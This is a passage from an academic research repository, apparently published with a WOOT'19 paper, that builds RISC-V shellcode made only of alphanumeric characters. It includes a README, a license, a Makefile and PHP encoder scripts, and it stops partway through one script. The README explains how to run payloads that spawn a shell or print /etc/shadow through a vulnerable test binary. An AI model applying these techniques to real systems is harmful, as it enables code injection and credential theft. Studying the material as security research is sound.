├── LICENSE
├── README.md
├── baremetal
    ├── hash
    │   ├── .gdbinit
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.txt
    │   ├── check.php
    │   ├── compute_fixup.php
    │   ├── encode_stage2.php
    │   ├── insert.php
    │   ├── l
    │   ├── loadgen.cpp
    │   ├── shellcode.bin
    │   ├── stage1.S
    │   ├── stage1.ld
    │   └── stage2.S
    ├── lists
    │   ├── .gitignore
    │   ├── Makefile
    │   └── geninst.php
    ├── payload
    ├── prebuilt
    │   ├── hash.bin
    │   ├── launch_hash
    │   ├── launch_slash
    │   ├── launch_tick
    │   ├── slash.bin
    │   └── tick.bin
    ├── scripts
    ├── slash
    │   ├── .gdbinit
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.txt
    │   ├── check.php
    │   ├── compute_fixup.php
    │   ├── encode_stage2.php
    │   ├── insert.php
    │   ├── l
    │   ├── loadgen.cpp
    │   ├── shellcode.bin
    │   ├── stage1.S
    │   ├── stage1.ld
    │   └── stage2.S
    └── tick
    │   ├── .gdbinit
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.txt
    │   ├── check.php
    │   ├── compute_fixup.php
    │   ├── insert.php
    │   ├── l
    │   ├── shellcode.bin
    │   ├── st2
    │       ├── README.txt
    │       ├── genst2.php
    │       ├── l
    │       ├── loadgen.cpp
    │       ├── st2_core.S
    │       └── try.cpp
    │   ├── stage1.S
    │   ├── stage1.ld
    │   └── stage2.S
├── fedora
    ├── .gitignore
    ├── Makefile
    ├── README.txt
    ├── check.php
    ├── encode.php
    ├── hash.S
    ├── main.c
    ├── slash.S
    └── tick.S
├── hifiveu
    ├── .gitignore
    ├── Makefile
    ├── README.txt
    ├── check.php
    ├── encode.php
    ├── hash.S
    ├── main.c
    ├── slash.S
    └── tick.S
├── payload
    ├── README.txt
    ├── payload.mk
    ├── payload_linux_etc_shadow.S
    ├── payload_linux_etc_shadow.c
    ├── payload_linux_etc_shadow.ld
    ├── payload_linux_hello.S
    ├── payload_linux_hello.c
    ├── payload_linux_hello.ld
    ├── payload_linux_shared.c
    ├── payload_linux_shell.S
    ├── payload_linux_shell.c
    ├── payload_linux_shell.ld
    ├── payload_serial.S
    ├── payload_serial.c
    └── payload_serial.ld
└── scripts
    ├── common.m4
    └── common.mk


/LICENSE:
--------------------------------------------------------------------------------
  1 | Copyright 2018-2019 Hadrien Barral
  2 | Copyright 2018-2019 Rémi Géraud
  3 | Copyright 2018-2019 Georges-Axel Jaloyan
  4 | 
  5 | Licensed under the Apache License, Version 2.0 (the "License");
  6 | you may not use this file except in compliance with the License.
  7 | You may obtain a copy of the License at
  8 | 
  9 |     http://www.apache.org/licenses/LICENSE-2.0
 10 | 
 11 | Unless required by applicable law or agreed to in writing, software
 12 | distributed under the License is distributed on an "AS IS" BASIS,
 13 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 | See the License for the specific language governing permissions and
 15 | limitations under the License.
 16 | 
 17 | The full text is provided below:
 18 | 
 19 |                                  Apache License
 20 |                            Version 2.0, January 2004
 21 |                         http://www.apache.org/licenses/
 22 | 
 23 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 24 | 
 25 |    1. Definitions.
 26 | 
 27 |       "License" shall mean the terms and conditions for use, reproduction,
 28 |       and distribution as defined by Sections 1 through 9 of this document.
 29 | 
 30 |       "Licensor" shall mean the copyright owner or entity authorized by
 31 |       the copyright owner that is granting the License.
 32 | 
 33 |       "Legal Entity" shall mean the union of the acting entity and all
 34 |       other entities that control, are controlled by, or are under common
 35 |       control with that entity. For the purposes of this definition,
 36 |       "control" means (i) the power, direct or indirect, to cause the
 37 |       direction or management of such entity, whether by contract or
 38 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 39 |       outstanding shares, or (iii) beneficial ownership of such entity.
 40 | 
 41 |       "You" (or "Your") shall mean an individual or Legal Entity
 42 |       exercising permissions granted by this License.
 43 | 
 44 |       "Source" form shall mean the preferred form for making modifications,
 45 |       including but not limited to software source code, documentation
 46 |       source, and configuration files.
 47 | 
 48 |       "Object" form shall mean any form resulting from mechanical
 49 |       transformation or translation of a Source form, including but
 50 |       not limited to compiled object code, generated documentation,
 51 |       and conversions to other media types.
 52 | 
 53 |       "Work" shall mean the work of authorship, whether in Source or
 54 |       Object form, made available under the License, as indicated by a
 55 |       copyright notice that is included in or attached to the work
 56 |       (an example is provided in the Appendix below).
 57 | 
 58 |       "Derivative Works" shall mean any work, whether in Source or Object
 59 |       form, that is based on (or derived from) the Work and for which the
 60 |       editorial revisions, annotations, elaborations, or other modifications
 61 |       represent, as a whole, an original work of authorship. For the purposes
 62 |       of this License, Derivative Works shall not include works that remain
 63 |       separable from, or merely link (or bind by name) to the interfaces of,
 64 |       the Work and Derivative Works thereof.
 65 | 
 66 |       "Contribution" shall mean any work of authorship, including
 67 |       the original version of the Work and any modifications or additions
 68 |       to that Work or Derivative Works thereof, that is intentionally
 69 |       submitted to Licensor for inclusion in the Work by the copyright owner
 70 |       or by an individual or Legal Entity authorized to submit on behalf of
 71 |       the copyright owner. For the purposes of this definition, "submitted"
 72 |       means any form of electronic, verbal, or written communication sent
 73 |       to the Licensor or its representatives, including but not limited to
 74 |       communication on electronic mailing lists, source code control systems,
 75 |       and issue tracking systems that are managed by, or on behalf of, the
 76 |       Licensor for the purpose of discussing and improving the Work, but
 77 |       excluding communication that is conspicuously marked or otherwise
 78 |       designated in writing by the copyright owner as "Not a Contribution."
 79 | 
 80 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 81 |       on behalf of whom a Contribution has been received by Licensor and
 82 |       subsequently incorporated within the Work.
 83 | 
 84 |    2. Grant of Copyright License. Subject to the terms and conditions of
 85 |       this License, each Contributor hereby grants to You a perpetual,
 86 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 87 |       copyright license to reproduce, prepare Derivative Works of,
 88 |       publicly display, publicly perform, sublicense, and distribute the
 89 |       Work and such Derivative Works in Source or Object form.
 90 | 
 91 |    3. Grant of Patent License. Subject to the terms and conditions of
 92 |       this License, each Contributor hereby grants to You a perpetual,
 93 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 94 |       (except as stated in this section) patent license to make, have made,
 95 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 96 |       where such license applies only to those patent claims licensable
 97 |       by such Contributor that are necessarily infringed by their
 98 |       Contribution(s) alone or by combination of their Contribution(s)
 99 |       with the Work to which such Contribution(s) was submitted. If You
100 |       institute patent litigation against any entity (including a
101 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
102 |       or a Contribution incorporated within the Work constitutes direct
103 |       or contributory patent infringement, then any patent licenses
104 |       granted to You under this License for that Work shall terminate
105 |       as of the date such litigation is filed.
106 | 
107 |    4. Redistribution. You may reproduce and distribute copies of the
108 |       Work or Derivative Works thereof in any medium, with or without
109 |       modifications, and in Source or Object form, provided that You
110 |       meet the following conditions:
111 | 
112 |       (a) You must give any other recipients of the Work or
113 |           Derivative Works a copy of this License; and
114 | 
115 |       (b) You must cause any modified files to carry prominent notices
116 |           stating that You changed the files; and
117 | 
118 |       (c) You must retain, in the Source form of any Derivative Works
119 |           that You distribute, all copyright, patent, trademark, and
120 |           attribution notices from the Source form of the Work,
121 |           excluding those notices that do not pertain to any part of
122 |           the Derivative Works; and
123 | 
124 |       (d) If the Work includes a "NOTICE" text file as part of its
125 |           distribution, then any Derivative Works that You distribute must
126 |           include a readable copy of the attribution notices contained
127 |           within such NOTICE file, excluding those notices that do not
128 |           pertain to any part of the Derivative Works, in at least one
129 |           of the following places: within a NOTICE text file distributed
130 |           as part of the Derivative Works; within the Source form or
131 |           documentation, if provided along with the Derivative Works; or,
132 |           within a display generated by the Derivative Works, if and
133 |           wherever such third-party notices normally appear. The contents
134 |           of the NOTICE file are for informational purposes only and
135 |           do not modify the License. You may add Your own attribution
136 |           notices within Derivative Works that You distribute, alongside
137 |           or as an addendum to the NOTICE text from the Work, provided
138 |           that such additional attribution notices cannot be construed
139 |           as modifying the License.
140 | 
141 |       You may add Your own copyright statement to Your modifications and
142 |       may provide additional or different license terms and conditions
143 |       for use, reproduction, or distribution of Your modifications, or
144 |       for any such Derivative Works as a whole, provided Your use,
145 |       reproduction, and distribution of the Work otherwise complies with
146 |       the conditions stated in this License.
147 | 
148 |    5. Submission of Contributions. Unless You explicitly state otherwise,
149 |       any Contribution intentionally submitted for inclusion in the Work
150 |       by You to the Licensor shall be under the terms and conditions of
151 |       this License, without any additional terms or conditions.
152 |       Notwithstanding the above, nothing herein shall supersede or modify
153 |       the terms of any separate license agreement you may have executed
154 |       with Licensor regarding such Contributions.
155 | 
156 |    6. Trademarks. This License does not grant permission to use the trade
157 |       names, trademarks, service marks, or product names of the Licensor,
158 |       except as required for reasonable and customary use in describing the
159 |       origin of the Work and reproducing the content of the NOTICE file.
160 | 
161 |    7. Disclaimer of Warranty. Unless required by applicable law or
162 |       agreed to in writing, Licensor provides the Work (and each
163 |       Contributor provides its Contributions) on an "AS IS" BASIS,
164 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
165 |       implied, including, without limitation, any warranties or conditions
166 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
167 |       PARTICULAR PURPOSE. You are solely responsible for determining the
168 |       appropriateness of using or redistributing the Work and assume any
169 |       risks associated with Your exercise of permissions under this License.
170 | 
171 |    8. Limitation of Liability. In no event and under no legal theory,
172 |       whether in tort (including negligence), contract, or otherwise,
173 |       unless required by applicable law (such as deliberate and grossly
174 |       negligent acts) or agreed to in writing, shall any Contributor be
175 |       liable to You for damages, including any direct, indirect, special,
176 |       incidental, or consequential damages of any character arising as a
177 |       result of this License or out of the use or inability to use the
178 |       Work (including but not limited to damages for loss of goodwill,
179 |       work stoppage, computer failure or malfunction, or any and all
180 |       other commercial damages or losses), even if such Contributor
181 |       has been advised of the possibility of such damages.
182 | 
183 |    9. Accepting Warranty or Additional Liability. While redistributing
184 |       the Work or Derivative Works thereof, You may choose to offer,
185 |       and charge a fee for, acceptance of support, warranty, indemnity,
186 |       or other liability obligations and/or rights consistent with this
187 |       License. However, in accepting such obligations, You may act only
188 |       on Your own behalf and on Your sole responsibility, not on behalf
189 |       of any other Contributor, and only if You agree to indemnify,
190 |       defend, and hold each Contributor harmless for any liability
191 |       incurred by, or claims asserted against, such Contributor by reason
192 |       of your accepting any such warranty or additional liability.
193 | 
194 |    END OF TERMS AND CONDITIONS
195 | 
196 |    APPENDIX: How to apply the Apache License to your work.
197 | 
198 |       To apply the Apache License to your work, attach the following
199 |       boilerplate notice, with the fields enclosed by brackets "[]"
200 |       replaced with your own identifying information. (Don't include
201 |       the brackets!)  The text should be enclosed in the appropriate
202 |       comment syntax for the file format. We also recommend that a
203 |       file or class name and description of purpose be included on the
204 |       same "printed page" as the copyright notice for easier
205 |       identification within third-party archives.
206 | 
207 |    Copyright [yyyy] [name of copyright owner]
208 | 
209 |    Licensed under the Apache License, Version 2.0 (the "License");
210 |    you may not use this file except in compliance with the License.
211 |    You may obtain a copy of the License at
212 | 
213 |        http://www.apache.org/licenses/LICENSE-2.0
214 | 
215 |    Unless required by applicable law or agreed to in writing, software
216 |    distributed under the License is distributed on an "AS IS" BASIS,
217 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
218 |    See the License for the specific language governing permissions and
219 |    limitations under the License.
220 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # RISC-V: #/'Alphanumeric Shellcoding
  2 | 
  3 | ```
  4 | By Hаdrien Ваrrаl, Rémi Géraud-Stewart, Georges-Axel Jaloyan, and David Naccache
  5 | ```
  6 | 
  7 | This work has been presented at
  8 |  [WOOT'19](https://www.usenix.org/conference/woot19/) ([paper](https://www.usenix.org/conference/woot19/presentation/barral))
  9 |  and [DEFCON27](https://www.defcon.org/html/defcon-27/dc-27-index.html) ([slides](https://xn--fda.fr/riscv-alphanumeric-shellcoding/defcon27_riscv-alphanumeric-shellcoding.pdf))
 10 | 
 11 | ## Overview
 12 | 
 13 | This tool helps design RISC-V (specifically RV64GC) shellcodes capable of running arbitrary code, whose ASCII binary representation
 14 | use only letters a–zA–Z, digits 0–9, and either of the three characters: `#`, `/`, `’`.
 15 | 
 16 | It consists of an alphanumeric (+1 character) unpacker. For any target shellcode (non-alphanumeric),
 17 | the tool will produce an alphanumeric (+1 character) shellcode with the unpacker and the packed version of your shellcode.
 18 | Run it on a RISC-V simulator/cpu and enjoy!
 19 | 
 20 | For a general introduction on RISC-V shellcoding, you may read the [blog post by Thomas Karpiniec](https://thomask.sdf.org/blog/2018/08/25/basic-shellcode-in-riscv-linux.html).
 21 | 
 22 | Folder contents:
 23 | - `baremetal`: Full source code and QEMU demo for each of the three variants
 24 | - `fedora`: Demos running on Fedora on QEMU
 25 | - `hifiveu`: Demos running on the HiFive-Unleashed board
 26 | - `payload`: Source code of the payloads used
 27 | - `lists`: How we generated the available instructions
 28 | - `scripts` / `tools`: Various helpers
 29 | 
 30 | ## Quick-try
 31 | 
 32 | Building the shellcodes requires to build a RISC-V toolchain from source.
 33 | We only provide easy-to-test pre-built baremetal shellcodes.
 34 | 
 35 | The only prerequisite is having a RISC-V QEMU v4.0.0 or newer [https://www.qemu.org/](https://www.qemu.org/)
 36 | 
 37 | Then:
 38 |   - `cd riscv-alphanumeric-shellcoding/baremetal/prebuilt`
 39 |   - `cat hash.bin` (optional, to print the shellcode)
 40 |   - `sh launch_hash`   use Ctrl+A then X to exit
 41 |   - `cat slash.bin` (optional, to print the shellcode)
 42 |   - `sh launch_slash`   use Ctrl+A then X to exit
 43 |   - `cat tick.bin` (optional, to print the shellcode)
 44 |   - `sh launch_tick`   use Ctrl+A then X to exit
 45 |  
 46 | ## Building && Testing
 47 | 
 48 | Start by cloning the repository:
 49 | ```
 50 | git clone https://github.com/RischardV/riscv-alphanumeric-shellcoding.git
 51 | cd riscv-alphanumeric-shellcoding
 52 | ```
 53 | 
 54 | #### Prerequisites:
 55 | 
 56 | __/!\ Warning: unless you are using a rolling-release distribution, you probably will not be able to simply install packages.
 57 |    You will need to install yourself the tools below:__
 58 | - RISC-V toolchain: install [https://github.com/riscv/riscv-gnu-toolchain](https://github.com/riscv/riscv-gnu-toolchain)
 59 | - RISC-V QEMU: install QEMU v4.0.0 or newer [https://www.qemu.org/](https://www.qemu.org/)
 60 | 
 61 | ### QEMU bare-metal shellcodes
 62 | 
 63 | - Build the instructions lists (takes some time)
 64 |   - `cd riscv-alphanumeric-shellcoding/baremetal/lists`
 65 |   - `make`
 66 | - Build the shellcodes
 67 |   - `cd riscv-alphanumeric-shellcoding/baremetal/hash`
 68 |   - `make`
 69 |   - `cd riscv-alphanumeric-shellcoding/baremetal/slash`
 70 |   - `make`
 71 |   - `cd riscv-alphanumeric-shellcoding/baremetal/tick`
 72 |   - `make`
 73 | - Run the shellcodes
 74 |   - `cd riscv-alphanumeric-shellcoding/baremetal/hash`
 75 |   - `cat shellcode.bin` (optional, to print the shellcode)
 76 |   - `sh l`   use Ctrl+A then X to exit
 77 |   - `cd riscv-alphanumeric-shellcoding/baremetal/slash`
 78 |   - `cat shellcode.bin` (optional, to print the shellcode)
 79 |   - `sh l`   use Ctrl+A then X to exit
 80 |   - `cd riscv-alphanumeric-shellcoding/baremetal/tick`
 81 |   - `cat shellcode.bin` (optional, to print the shellcode)
 82 |   - `sh l`   use Ctrl+A then X to exit
 83 | Expected results:
 84 |   The string "Hello, world!" should print on the screen.
 85 | 
 86 | ### QEMU Linux shellcodes
 87 | 
 88 | Prerequisites: A Fedora 28 Linux image running in a QEMU riscv environment (see [here](https://fedorapeople.org/groups/risc-v/disk-images/) and
 89 |   [here](https://wiki.qemu.org/Documentation/Platforms/RISCV#Booting_64-bit_Fedora)). 
 90 | 
 91 | - Build the shellcodes
 92 |   - `cd riscv-alphanumeric-shellcoding/fedora`
 93 |   - `make`
 94 | - Run the shellcodes
 95 |   - Start your Fedora RISC-V virtual machine
 96 |   - From the *host*: Send the compiled files `riscv-alphanumeric-shellcoding/fedora/{out,build/vuln.bin}` to the virtual machine (e.g. using scp)
 97 |   - On the *guest* Fedora VM: run the shellcodes using:
 98 |     * Hello word shellcodes:
 99 |         - `./vuln.bin < out/hello_hash.txt` for the 'hash' flavored shellcode
100 |         - `./vuln.bin < out/hello_slash.txt` for the 'slash' flavored shellcode
101 |         - `./vuln.bin < out/hello_tick.txt` for the 'tick' flavored shellcode
102 |     
103 | 	Expected results:
104 |           the string "Hello, world from shellcode!\n" should print on stdout
105 | 
106 |     * Execve /bin/sh shellcodes:
107 |         - `(cat out/shell_hash.txt; echo ""; cat) | ./vuln.bin` for the 'hash' flavored shellcode
108 |         - `(cat out/shell_slash.txt; echo ""; cat) | ./vuln.bin` for the 'slash' flavored shellcode
109 |         - `(cat out/shell_tick.txt; echo ""; cat) | ./vuln.bin` for the 'tick' flavored shellcode
110 | 	
111 | 	Expected results:
112 |           a shell should spawn with no prompt. To test it, type any command (e.g. `id`) and press enter. To exit the shell, type exit and then press enter.
113 | 
114 |     * Printing /etc/shadow shellcodes:
115 |         - `./vuln.bin < out/shadow_hash.txt` for the 'hash' flavored shellcode
116 |         - `./vuln.bin < out/shadow_slash.txt` for the 'slash' flavored shellcode
117 |         - `./vuln.bin < out/shadow_tick.txt` for the 'tick' flavored shellcode
118 | 	
119 | 	Expected results:
120 | 	  the contents of the shadow file should be printed on stdout
121 | 
122 |     * Custom payloads (section 5.3 of the paper). You may modify the payload located in the `riscv_alphanumeric/payload` directory.
123 | 
124 | ### HiFive Unleashed Linux shellcodes
125 | 
126 | Prerequisites: 
127 |  - A HiFive-Unleashed board: [https://www.sifive.com/boards/hifive-unleashed](https://www.sifive.com/boards/hifive-unleashed)
128 |  - The HiFive toolchain: [https://github.com/sifive/freedom-u-sdk](https://github.com/sifive/freedom-u-sdk)
129 | 
130 | - Build the shellcodes
131 |   - `cd riscv-alphanumeric-shellcoding/hifiveu`
132 |   - `make`
133 | 
134 | Running instructions are very similar to QEMU Linux shellcodes above. Refer to them.
135 | 
136 | ## Documentation
137 | 
138 | Our academic paper gives a lot of details about design choices.
139 | We encourage you to read it if you want to understand how the code works.
140 | 
141 | [Link to paper](https://xn--fda.fr/riscv-alphanumeric-shellcoding/preprint_riscv-alphanumeric-shellcoding.pdf)
142 | 
143 | ## License
144 | 
145 | This tool is released under MIT license. See `LICENSE` file.
146 | 


--------------------------------------------------------------------------------
/baremetal/hash/.gdbinit:
--------------------------------------------------------------------------------
1 | target remote :1235
2 | layout next
3 | layout next
4 | layout next
5 | layout next
6 | layout next
7 | set riscv use_compressed_breakpoints no
8 | 


--------------------------------------------------------------------------------
/baremetal/hash/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | 


--------------------------------------------------------------------------------
/baremetal/hash/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | RV_ABI    := rv64ic
 7 | include ../scripts/common.mk
 8 | NAME      := shellcode
 9 | PAYD      := payload_serial
10 | 
11 | all: $(NAME).bin
12 | 
13 | $(BUILD):
14 | 	$(Q)mkdir -p $@
15 | 
16 | $(BUILD)/stage1_nofixup.o: stage1.S $(BUILD)/stage2_encoded.S
17 | 	$(Q)m4 -I $(BUILD) $< > $(BUILD)/$<.m4.S
18 | 	$(Q)$(GCC) -DCOMPUTE_XP_FIXUP -o $(BUILD)/$<.i -P -E $(BUILD)/$<.m4.S
19 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ -c $(BUILD)/$<.i
20 | 
21 | $(BUILD)/xp_fixup.S: $(BUILD)/stage1_nofixup.o compute_fixup.php
22 | 	$(Q)$(OBJDUMP) -x $< | grep step6 | awk '{print $$1}' > $@.step6_value
23 | 	$(Q)php $(word 2,$^) -i $@.step6_value -o $@
24 | 
25 | $(BUILD)/stage1.o: stage1.S $(BUILD)/stage2_encoded.S $(BUILD)/xp_fixup.S
26 | 	$(Q)m4 -I $(BUILD) $< > $(BUILD)/$<.m4.S
27 | 	$(Q)$(GCC) -o $(BUILD)/$<.i -P -E $(BUILD)/$<.m4.S
28 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ -c $(BUILD)/$<.i
29 | 
30 | $(BUILD)/stage1.elf: $(BUILD)/stage1.o stage1.ld
31 | 	$(Q)$(LD) $(LDFLAGS) -T $(word 2,$^) -o $@ $<
32 | 
33 | $(BUILD)/stage1.bin: $(BUILD)/stage1.elf
34 | 	$(Q)$(OBJCOPY) -O binary $< $@
35 | 
36 | $(BUILD)/$(NAME).bin.nocheck: $(BUILD)/stage1.bin $(BUILD)/$(PAYD).bin \
37 |                               $(BUILD)/stage1.o insert.php $(BUILD)/stage2_encoded.S
38 | 	$(Q)$(OBJDUMP) -x $(word 3,$^) | grep step6 | awk '{print $$1}' > $@.step6_value
39 | 	$(Q)grep "^next_block$$" $(word 5,$^) | wc -l > $@.stage2_value
40 | 	$(Q)php $(word 4,$^) -i $< -p $(word 2,$^) -v $@.step6_value -t $@.stage2_value -o $@
41 | 
42 | $(NAME).bin: $(BUILD)/$(NAME).bin.nocheck check.php
43 | 	$(Q)php $(word 2,$^) -i $< -c "A-Za-z0-9#"
44 | 	$(Q)cp $< $@
45 | 
46 | $(BUILD)/stage2.o: stage2.S | $(BUILD)
47 | 	$(Q)$(GCC) -o $(BUILD)/$<.i -P -E $<
48 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ $(BUILD)/$<.i
49 | 
50 | $(BUILD)/stage2.bin: $(BUILD)/stage2.o
51 | 	$(Q)$(OBJCOPY) -O binary $< $@
52 | 
53 | $(BUILD)/stage2_encoded.S: $(BUILD)/stage2.bin encode_stage2.php $(BUILD)/loadgen.json
54 | 	$(Q)php $(word 2,$^) -i $< -o $@ -l $(word 3,$^)
55 | 
56 | $(BUILD)/loadgen: loadgen.cpp
57 | 	$(Q)g++ -Wall -Wextra -O3 -march=native -pthread -std=gnu++17 -fconcepts $< -o $@
58 | 
59 | $(BUILD)/loadgen.json: $(BUILD)/loadgen ../lists/hash_64.txt
60 | 	$(Q)$< $@ $(word 2,$^) $(BUILD)/loadgen.split
61 | 
62 | include ../payload/payload.mk
63 | $(eval $(call build_payload,$(PAYD),0x8000800580,$(BUILD)/$(PAYD).bin))
64 | 
65 | clean:
66 | 	$(Q)rm -rf $(BUILD) $(NAME).bin
67 | 


--------------------------------------------------------------------------------
/baremetal/hash/README.txt:
--------------------------------------------------------------------------------
1 | This folder contains the 'Hello World' #RV64IC demo on QEMU.
2 | 


--------------------------------------------------------------------------------
/baremetal/hash/check.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	$args = getopt('i:c:');
 9 | 
10 | 	$f = file_get_contents($args['i']);
11 | 
12 | 	$regex = "/[".$args['c']."]/";
13 | 
14 | 	/* For debug */
15 | 	function not_alnum_verbose(&$f, $regex) {
16 | 		$len = strlen($f);
17 | 		for ($i=0; $i<$len; $i++) {
18 | 			$c = $f[$i];
19 | 			if (preg_replace($regex, '', $c) !== '') {
20 | 				printf("Not alnum (0x%x)!\n", $i);
21 | 				return;
22 | 			}
23 | 		}
24 | 	}
25 | 
26 | 	if (preg_replace($regex, '', $f) !== '') {
27 | 		not_alnum_verbose($f, $regex);
28 | 		//exit(0); /* For dev */
29 | 		exit(1);
30 | 	}
31 | ?>


--------------------------------------------------------------------------------
/baremetal/hash/compute_fixup.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | $args = getopt('i:o:');
 9 | 
10 | $f = file_get_contents($args['i']);
11 | 
12 | $step6_offset = intval($f, 16);
13 | $xp_init_value = 4+1920; /* Sync with 'jal step1' + store offset */
14 | if($step6_offset < $xp_init_value) {
15 | 	die("Oops. Please improve the algorithm (1).");
16 | }
17 | $xp_offset = $step6_offset - $xp_init_value;
18 | $addi_cost = 2;
19 | $sp_ops = [112,-112,144,-144,16,-160,176,-176,-192,208,-208,240,-240,
20 |            272,-272,304,-304,320,336,-336,352,368,-368,400,-400,-432,
21 | 		   448,464,-464,48,-48,-496,-64,80];
22 | 
23 | foreach($sp_ops as &$e) {
24 | /* Negative weights are difficult to handle.
25 |    Here, they would not make the optimal better than more than a single instruction.
26 |    (because [1-29] can be made by at most the sum of 2 values)
27 |    Let us drop them. */
28 | 	if($e < 0) {
29 | 		unset($sp_ops[$e]);
30 | 	} else {
31 | 		$e -= 2; /* Remove the cost from the instruction itself */
32 | 	}
33 | }
34 | sort($sp_ops);
35 | /* We now have 1,3,5,7,9,11,13,15,17,19,20,21,22,23,25,28,29 */
36 | 
37 | /* We need quite a lot of 464, and we have 448 available.
38 |  * Thus we simply need to compute an upper bound with 464,
39 |  * then switch some of the 464 to 448 to get down at close
40 |  * as possible to the target.
41 |  */
42 | 
43 | $v464 = 464-$addi_cost;
44 | $v448 = 448-$addi_cost;
45 | 
46 | if($xp_offset == 0) {
47 | 	die("Oops. Please improve the algorithm (2).");
48 | }
49 | 
50 | $n464 = ceil($xp_offset / $v464); /* quotient */
51 | $r464 = $v464 - ($xp_offset % $v464); /* remainder */
52 | $n448 = floor($r464 / ($v464-$v448));
53 | 
54 | $n464 -= $n448;
55 | if($n464 < 0) {
56 | 	die("Oops. Please improve the algorithm (3).");
57 | }
58 | 
59 | $r448 = $n464*$v464 + $n448*$v448 - $xp_offset;
60 | if(($r448%2) !== 0) {
61 | 	die("Oops. Please improve the algorithm (4).");
62 | }
63 | $end_nopsled = $r448 / 2;
64 | 
65 | $s = ".macro xp_fixup\n".
66 | 	 sprintf("    # n464:%d n448:%d\n", $n464, $n448).
67 | 	 str_repeat("    addi XP, XP, 464\n", $n464).
68 | 	 str_repeat("    addi XP, XP, 448\n", $n448).
69 | 	 ".endm\n".
70 | 	 ".macro end_nopsled\n".
71 | 	 sprintf("    # len:%d\n", $end_nopsled).
72 | 	 str_repeat("    dangerous_nop2\n", $end_nopsled).
73 | 	 ".endm\n";
74 | file_put_contents($args['o'], $s);
75 | 
76 | ?>


--------------------------------------------------------------------------------
/baremetal/hash/encode_stage2.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | $args = getopt('i:o:l:');
 9 | 
10 | $t = json_decode(file_get_contents($args['l']), true);
11 | 
12 | if(gettype($t) !== 'array') {
13 | 	die("loadgen.json load failed\n");
14 | }
15 | 
16 | $f = file_get_contents($args['i']);
17 | 
18 | $s = '';
19 | 
20 | $l = strlen($f);
21 | 
22 | $store_offset = 1920;
23 | 
24 | for($i=0; $i<$l; $i+=2) {
25 | 	if($i+1>=$l) {
26 | 		die("Invalid binary size.");
27 | 	}
28 | 
29 | 	$value = ord($f[$i]) + ((ord($f[$i+1])) << 8);
30 | 	if(isset($t[$value])) {
31 | 		$s .= sprintf("# Loading 0x%x in x%d\n%s\n", $value, $t[$value]['dst'], $t[$value]['txt']);
32 | 
33 | 		$dst = $t[$value]['dst'];
34 | 		switch($dst) {
35 | 			case 20:
36 | 				$dst = "s4";
37 | 				break;
38 | 			case 6:
39 | 				$dst = "t1";
40 | 				break;
41 | 			default:
42 | 				printf("Unknown store register '".$dst."'\n");
43 | 				exit(1);
44 | 		}
45 | 
46 | 		$s .= sprintf("sd %s, %d(XP)\n", $dst, $store_offset);
47 | 	} else {
48 | 		printf("Nomatch [i:0x%x]: 0x%x\n", $i, $value);
49 | 		exit(1);
50 | 	}
51 | 
52 | 	$store_offset += 2;
53 | 	if($store_offset > 1938) {
54 | 		$s .= "next_block\n";
55 | 		$store_offset -= 16;
56 | 	}
57 | }
58 | 
59 | file_put_contents($args['o'], $s);
60 | ?>


--------------------------------------------------------------------------------
/baremetal/hash/insert.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	function error($errno, $errstr, $errfile, $errline) {
 9 | 		throw new ErrorException($errstr, $errno, 0, $errfile, $errline);
10 | 	}
11 | 	set_error_handler('error');
12 | 
13 | 	$args = getopt('i:p:v:t:o:');
14 | 
15 | 	$s = file_get_contents($args['i']); /* Input file */
16 | 	$p = file_get_contents($args['p']); /* Payload */
17 | 	$v = file_get_contents($args['v']); /* step6 offset to compute pool offset */
18 | 	$v = intval($v, 16);
19 | 	$t = file_get_contents($args['t']); /* stage2 sp shift */
20 | 	$t = intval($t, 10);
21 | 	$b = $v - 0x1000 + (16*$t) - 1920;  /* Sync with stage2 start load address and store offset */
22 | 	$maxpayload = 0x400; /* It is possible to increase it with minor work */
23 | 
24 | 	if(strlen($p) > $maxpayload) {
25 | 		printf("Payload too large: %d/%d\n", strlen($p), $maxpayload);
26 | 		exit(-1);
27 | 	}
28 | 	printf("insert: %d bytes from offset:0x%x\n", 2*strlen($p), $b);
29 | 	for($i=0; $i<min($maxpayload, strlen($p)); $i++)
30 | 	{
31 | 		/* [Notation: capital letters are hex digits]
32 | 		 * We want to encode byte 'XY' in alnum bytes 'KA' 'LB'.
33 | 		 * The equation to solve (see stage2.S) is:
